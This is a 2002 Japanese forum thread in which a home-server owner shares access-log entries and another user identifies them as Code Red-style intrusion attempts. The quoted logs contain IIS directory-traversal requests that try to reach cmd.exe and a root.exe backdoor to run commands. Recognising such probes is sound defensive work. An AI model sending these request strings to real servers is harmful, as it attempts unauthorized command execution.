投稿日:2002年08月21日 作成鷹の巣

No.4675 このサーバー機のログは、不正アクセス?!



このサーバー機のログは、不正アクセス?!

No.4675 投稿時間:2002年08月21日(Wed) 06:36 投稿者名:ひらぽん URL:http://www.hirapon.com

こんにちは!
自宅サーバー構築中にクライアント機の電源がパンクして作業一時中断中です。
サーバー機のログをみてみると、

218.200.*.* - - "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 254
218.200.*.* - - "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
218.200.*.* - - "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
218.200.*.* - - "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
218.200.*.* - - "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 268
218.200.*.* - - "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
218.200.*.* - - "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
218.200.*.* - - "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
218.200.*.* - - "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215

というアクセスが毎日やってきます。
時間は夜中であろうと昼間であろうと...。
これって不正アクセスをしようとしているのでしょうか?
ftpでアクセスして失敗した形跡もあったのですが、
私のサーバーまだ開設して間もないのに、暇な人?(暇な人に仕込まれた真面目なPC)もいるものですね?


コードレッドだと思います。

No.4679 投稿時間:2002年08月21日(Wed) 13:54 投稿者名:パソマイン URL:http://paso.mine.nu/

> こんにちは!
> 自宅サーバー構築中にクライアント機の電源がパンクして作業一時中断中です。
> サーバー機のログをみてみると、
>
> 218.200.*.* - - "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 254
> 218.200.*.* - - "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
(中略)
> 218.200.*.* - - "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
> 218.200.*.* - - "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
>
> というアクセスが毎日やってきます。
> 時間は夜中であろうと昼間であろうと...。
> これって不正アクセスをしようとしているのでしょうか?

不正アクセスです。コードレッドだと思います。

> ftpでアクセスして失敗した形跡もあったのですが、
> 私のサーバーまだ開設して間もないのに、暇な人?(暇な人に仕込まれた真面目なPC)もいるものですね?

私も詳しくは知らないのですが、クラッカーはランダムなIPで不正アクセス
するそうです。私のサイトの場合も、解説直後から不正アクセスがあり、
簡単なレポですが、
http://paso.mine.nu/security/security_attack.html
として上げてあります。NT+IIS の場合は要注意ですね。

では。


|目次|掲示板|過去ログ目次|▲頁先頭|